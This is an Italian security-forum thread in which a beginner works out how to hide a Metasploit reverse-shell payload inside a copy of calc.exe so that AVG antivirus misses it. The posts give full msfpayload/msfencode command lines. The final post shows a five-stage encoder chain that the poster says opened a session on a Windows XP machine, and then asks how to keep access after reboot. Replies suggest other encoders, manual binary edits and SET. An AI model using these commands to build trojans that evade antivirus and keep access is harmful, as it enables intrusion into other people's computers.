Results 1 to 6 of 6

Thread: problema con msfencode: files di 0 KB

  1. #1
    Just burned his ISO
    Join Date
    Apr 2011
    Posts
    10

    Default problema con msfencode: files di 0 KB

    Ciao a tutti,
    Sono un newbie ed è la prima volta che cerco di utilizzare metasploit framework 3 console con backtrack 4 r2 (installata su HD di un portatile acer aspire one)…

    Sono, come già detto, alle prime armi e la mia conoscenza informatica è basata solo sulle varie guide che ho trovato nel web, per cui, per favore siate pazienti

    Ho cercato di creare un .exe con metasploit con questo comando:

    ./msfpayload windows/meterpreter/reverse_tcp LHOST=<my_ip> LPORT= 4444 X > myfile.exe

    Tutto ok, il file viene generato ed ha una grandezza di 72 kb.

    Ovviamente myfile.exe viene riconosciuto dall’antivirus AVG di un altro MIO computer con windows xp sp3.

    Se provo ad accedere al file, mi dice “accesso negato etc. etc.”

    Ho cercato allora di encodarlo con il comando :

    ./msfpayload windows/meterpreter/reverse_tcp LHOST=<my_ip> LPORT=4444 R |./msfencode -t exe -x root/payload.exe -k -o myfile2.exe -e x86/shikata_ga_nai -c 50

    Sembrerebbe tutto ok perché ho ottenuto:
    [*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)

    fino a:
    [*] x86/shikata_ga_nai succeeded with size 1684 (iteration=50)

    Il problema è che il file myfile2.exe viene generato, ma la sua dimensione è 0 KB! E’ vuoto.

    Ho anche cercato di codificare un paylod utilizzando la calcolatrice di Windows (calc.exe) con il comando:

    ./msfpayload windows/meterpreter/reverse_tcp LHOST==<my_ip> |./msfencode -t exe -x /root/calc.exe -k -o calc2.exe -e x86/shikata_ga_nai -c 5

    In questo caso ottengo il file calc2.exe con dimensione 116 KB, ma con il medesimo problema, cioè.che viene riconosciuto da AVG .

    Provando allora ad aumentare il parametro –c a 50 per bypassare AVG:

    ./msfpayload windows/meterpreter/reverse_tcp LHOST==<my_ip> |./msfencode -t exe -x /root/calc.exe -k -o calc3.exe -e x86/shikata_ga_nai -c 50

    ottengo come prima l’output:
    [*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)

    fino a:
    [*] x86/shikata_ga_nai succeeded with size 1684 (iteration=50)

    Ma il file calc3.exe è ancora di 0 KB

    Il problema persiste con qualsiasi valore assegnato al parametro -c

    Dove sto sbagliando?

    Spero di aver postato nella sezione giusta (in caso diverso prego gli amministratori di scusarmi) e di non aver infranto nessuna regola del forum…

    Ringrazio anticipatamente per l’eventuale risposta…

  2. #2
    Junior Member Focaccia's Avatar
    Join Date
    Jun 2009
    Posts
    63

    Default Re: problema con msfencode: files di 0 KB

    che venga riconosciuto è normale, sono cose standard ormai, e 50 iterazioni ti va in errore, di solito nn si supera il 10

  3. #3
    Just burned his ISO
    Join Date
    Apr 2011
    Posts
    10

    Default Riferimento: problema con msfencode: files di 0 KB

    50 iterazioni va in errore? Possibile che la guida che ho trovato (si suggeriscono anche fino a 150 iterazioni) sia così assurda? Eppure c’è l’immagine di un file creato (a detta dell’autore)con 150 iterazioni di shikata_ga_nai + 50 iterazioni di un altro encoder che non viene riconosciuto da un tester di virus online…. Boh?

    Comunque sono ad un punto morto: il file encodato con un qualsiasi valore –c da 1 a 10 è impossibile da lanciare anche disattivando AVG…

    Mi sapresti/ e indicare una guida affidabile o indicarmi i comandi per creare un .exe che sia accessibile (anche disattivando l’antivirus) ed eseguibile sull’altro pc?

    Ho provato anche ad esercitarmi con metasploit, ma con tutti gli exploit che ho provato (sono sempre i soliti che si trovano nelle guide online, tipo aurora, ms_08_067_netapi) ottengo sempre il solito messaggio “exploit completed, but no session was created”…

    Grazie mille, e buona giornata

  4. #4

    Default Re: Riferimento: problema con msfencode: files di 0 KB

    Salve.

    A volte le cose non sono semplici. Potresti provare altri encoder, oppure modificare tu il binario in modo che non sia rilevato.
    Ci sono varie tecniche, ma devi le approfondire tu

    Quando gli strumenti non arrivano a fare quello che vuoi: TRY HARDER

    PS: hai provato altri encoders di metasploit cmq? O a utilizzare payloads diversi?

  5. #5
    Junior Member Focaccia's Avatar
    Join Date
    Jun 2009
    Posts
    63

    Default Re: Riferimento: problema con msfencode: files di 0 KB

    Quote Originally Posted by Hizagashira View Post
    Mi sapresti/ e indicare una guida affidabile o indicarmi i comandi per creare un .exe che sia accessibile (anche disattivando l’antivirus) ed eseguibile sull’altro pc?
    usa SET, per il resto l'unica è provare e riprovare

  6. #6
    Just burned his ISO
    Join Date
    Apr 2011
    Posts
    10

    Default Riferimento: Re: Riferimento: problema con msfencode: files di 0 KB

    Ok, dopo vari tentativi ce l'ho fatta!

    Il file funzionante l'ho encodato così:

    ./msfpayload windows/shell/reverse_tcp LHOST=192.168.0.2 LPORT=443 R | msfencode -e x86/shikata_ga_nai -c 3 -t raw | msfencode -e x86/call4_dword_xor -c 4 -t raw | msfencode -e x86/fnstenv_mov -c 5 -t raw | msfencode -e x86/countdown -c 4 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t exe -x /root/calc.exe -k -o /root/calc_new_02_443.exe

    al clic sulla "nuova" calcolatrice in un SO Windows XP con firewall attivo e AVG (non aggiornato) attivo
    si è finalmente aperta la sessione :-))))
    ho fatto "migrate" su explorer.exe
    sembra funzionare tutto,
    ora devo imparare come rendere permanente l'accesso, anche dopo il reboot.... qualche consiglio?

Similar Threads

  1. msfencode and dll
    By spawn in forum Experts Forum
    Replies: 3
    Last Post: 09-08-2010, 08:04 PM
  2. msfencode ??
    By BurningDownBabylon in forum Beginners Forum
    Replies: 3
    Last Post: 05-12-2010, 10:35 AM
  3. ./msfencode ?
    By loop4me in forum OLD BackTrack 4 Software Related Issues
    Replies: 14
    Last Post: 03-10-2010, 12:16 AM
  4. msfencode
    By 100%digital in forum Beginners Forum
    Replies: 2
    Last Post: 03-03-2010, 06:19 PM
  5. msfpayload/msfencode
    By spawn in forum OLD Pentesting
    Replies: 4
    Last Post: 10-02-2009, 01:53 PM

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •